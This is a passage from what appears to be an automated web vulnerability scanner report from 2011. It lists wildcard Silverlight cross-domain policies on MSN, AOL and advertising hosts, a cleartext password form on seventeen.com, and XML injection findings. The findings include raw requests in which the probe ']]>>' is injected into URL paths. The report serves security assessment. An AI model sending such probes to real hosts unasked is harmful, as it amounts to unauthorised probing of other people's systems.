Host: img.widgets.video.s-msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Type: text/xml
Last-Modified: Fri, 15 Jul 2011 09:32:07 GMT
Accept-Ranges: bytes
ETag: "9bc59c10d242cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:28:02 GMT
Content-Length: 348
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...
6.16. http://img1.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img1.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "bd4e6a41d40cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 433
Age: 144
Date: Sat, 17 Sep 2011 16:32:42 GMT
Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT
Expires: Sat, 01 Oct 2011 16:30:18 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...
6.17. http://img2.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img2.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img2.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT
Accept-Ranges: bytes
ETag: "bd4e6a41d40cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:34:42 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...
6.18. http://img3.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img3.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT
Accept-Ranges: bytes
ETag: "bd4e6a41d40cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:30:18 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...
6.19. http://img4.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img4.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img4.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT
Accept-Ranges: bytes
ETag: "bd4e6a41d40cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:32:16 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...
6.20. http://metrics.elle.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.elle.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.elle.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:38:13 GMT
Server: Omniture DC/2.0.0
xserver: www637
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.21. http://metrics.seattlepi.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.seattlepi.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.seattlepi.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:36 GMT
Server: Omniture DC/2.0.0
xserver: www7
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.22. http://o.aolcdn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "d8baf0f1b81f70a7f23356194f1356bd:1219856443"
Last-Modified: Wed, 27 Aug 2008 17:00:43 GMT
Content-Type: application/xml
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:35:32 GMT
Date: Sat, 17 Sep 2011 17:35:32 GMT
Content-Length: 338
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
6.23. http://o.sa.aol.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.sa.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:37:16 GMT
Server: Omniture DC/2.0.0
xserver: www334
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.24. http://omnituretrack.local.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituretrack.local.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omnituretrack.local.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:49 GMT
Server: Omniture DC/2.0.0
xserver: www400
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.25. http://pixel.quantserve.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Sun, 18 Sep 2011 16:23:09 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sat, 17 Sep 2011 16:23:09 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...
6.26. http://rad.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 22 Jul 2011 17:49:14 GMT
Accept-Ranges: bytes
ETag: "0c969ab9748cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 17 Sep 2011 16:27:57 GMT
Connection: keep-alive
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...
6.27. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 17 Sep 2011 02:43:44 GMT
Expires: Sat, 17 Sep 2011 02:43:14 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 49784
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
6.28. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 16:23:07 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Sat, 24 Sep 2011 16:23:07 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...
6.29. http://shadow01.yumenetworks.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shadow01.yumenetworks.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: shadow01.yumenetworks.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:33 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Last-Modified: Fri, 18 Mar 2011 20:57:11 GMT
ETag: "12ab3f0-135-49ec80592d7c0"
Accept-Ranges: bytes
Content-Length: 309
P3P: policyref="http://qa-web-001.sjc1.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Access-Control-Allow-Origin: *
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<grant-to>
<resourc
...[SNIP]...
6.30. http://spe.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Sat, 24 Sep 2011 09:05:06 GMT
Date: Sat, 17 Sep 2011 16:39:32 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
6.31. http://video.od.visiblemeasures.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.od.visiblemeasures.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: video.od.visiblemeasures.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 16:30:16 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Wed, 09 Mar 2011 01:34:36 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from>
               <domain uri="*" />
           </allow-from>
<grant-to>
<r
...[SNIP]...
6.32. http://vms.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vms.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: vms.msn.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 28 Aug 2009 08:31:44 GMT
Accept-Ranges: bytes
ETag: "01864f9b927ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:30:26 GMT
Connection: keep-alive
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...
6.33. http://y.timesunion.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://y.timesunion.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: y.timesunion.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:22 GMT
Server: Omniture DC/2.0.0
xserver: www653
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.34. http://ts3.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts3.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts3.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sat, 17 Sep 2011 16:29:48 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...
6.35. http://choice.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: choice.atdmt.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 09 Aug 2011 10:30:16 GMT
Accept-Ranges: bytes
ETag: "06c2d547f56cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:47:03 GMT
Connection: close
Content-Length: 416

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="http://choice.live.com"/>
<domain uri="https://choice.live.com"/>
...[SNIP]...
6.36. http://choice.bing.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.bing.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: choice.bing.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 09 Aug 2011 10:30:16 GMT
Accept-Ranges: bytes
ETag: "06c2d547f56cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:47:00 GMT
Connection: close
Content-Length: 416

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="http://choice.live.com"/>
<domain uri="https://choice.live.com"/>
...[SNIP]...
6.37. http://choice.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: choice.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 09 Aug 2011 10:30:16 GMT
Accept-Ranges: bytes
ETag: "06c2d547f56cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:47:14 GMT
Connection: close
Content-Length: 416

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="http://choice.live.com"/>
<domain uri="https://choice.live.com"/>
...[SNIP]...
6.38. http://choice.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: choice.msn.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 09 Aug 2011 10:30:16 GMT
Accept-Ranges: bytes
ETag: "06c2d547f56cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:46:36 GMT
Connection: close
Content-Length: 416

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="http://choice.live.com"/>
<domain uri="https://choice.live.com"/>
...[SNIP]...
7. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seventeen.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET / HTTP/1.1
Host: www.seventeen.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=68
Date: Sat, 17 Sep 2011 16:34:01 GMT
Content-Length: 103172
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns
...[SNIP]...
</div>
<form name="login" id="amin" onsubmit="$h.FB.modal.loginForm.submit(); return false;">


<b>
...[SNIP]...
</div>
<input name="password" id="password" type="password" class="password" />

<div id="button" class="right">
...[SNIP]...
8. XML injection  previous  next
There are 78 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

8.1. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://adunit.cdn.auditude.com
Path:   /flash/modules/display/auditudeDisplayLib.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /flash]]>>/modules/display/auditudeDisplayLib.js?callback=ndn.auditudeCallback&width=300&height=225&version=adunit-1.0&domain=auditude.com&zoneId=50912&mediaId=23408962&parentNode=auditudeContent&keyValues=dpid=90009;sitesection=stamford_hom;sec=hom;sub=;wgt=1;width=300;height=225;url=http://www.stamfordadvocate.com/&autoPlay=true&ndnR=4060&countdownMessage=Todays%20Top%20Videos%20available%20in%20{countdown} HTTP/1.1
Host: adunit.cdn.auditude.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/_fw/common/toppicks_common1.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom&ZoneID=50912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=604800
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:28:00 GMT
Expires: Sat, 24 Sep 2011 16:28:00 GMT
Server: EOS (lax002/2898)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.2. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://adunit.cdn.auditude.com
Path:   /flash/modules/display/auditudeDisplayLib.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /flash/modules]]>>/display/auditudeDisplayLib.js?callback=ndn.auditudeCallback&width=300&height=225&version=adunit-1.0&domain=auditude.com&zoneId=50912&mediaId=23408962&parentNode=auditudeContent&keyValues=dpid=90009;sitesection=stamford_hom;sec=hom;sub=;wgt=1;width=300;height=225;url=http://www.stamfordadvocate.com/&autoPlay=true&ndnR=4060&countdownMessage=Todays%20Top%20Videos%20available%20in%20{countdown} HTTP/1.1
Host: adunit.cdn.auditude.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/_fw/common/toppicks_common1.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom&ZoneID=50912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=604800
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:28:07 GMT
Expires: Sat, 24 Sep 2011 16:28:07 GMT
Server: EOS (lax002/54FE)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
